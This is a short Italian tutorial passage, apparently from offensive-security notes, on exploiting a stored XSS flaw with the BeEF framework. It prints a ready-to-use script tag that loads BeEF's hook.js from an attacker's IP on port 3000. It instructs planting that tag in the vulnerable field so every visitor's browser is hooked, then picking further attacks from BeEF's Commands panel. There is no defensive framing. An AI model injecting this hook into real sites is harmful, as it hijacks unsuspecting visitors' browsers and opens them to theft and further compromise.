Quando troviamo una vulnerbilità stored-XSS possiamo utilizzare Beef per agganciare il browser di chi visita il nostro link per poi effettuare ulteriori attacchi tramite il frame-work Beef.
Quando lanciamo Beef lui ci fornisce un link come il seguente:
<script src="http://<IP>:3000/hook.js"></script>Noi inseriamo questo link nella sezione vulnerabile e chiunque visiti questo sito viene agganciato al framework Beef.
Dal framework di Beef apparirà il browser sotto la voce Browser Online da li possiamo cliccarci sopra e andare nella sezione Commands dove appariranno tutti gli attacchi disponibili.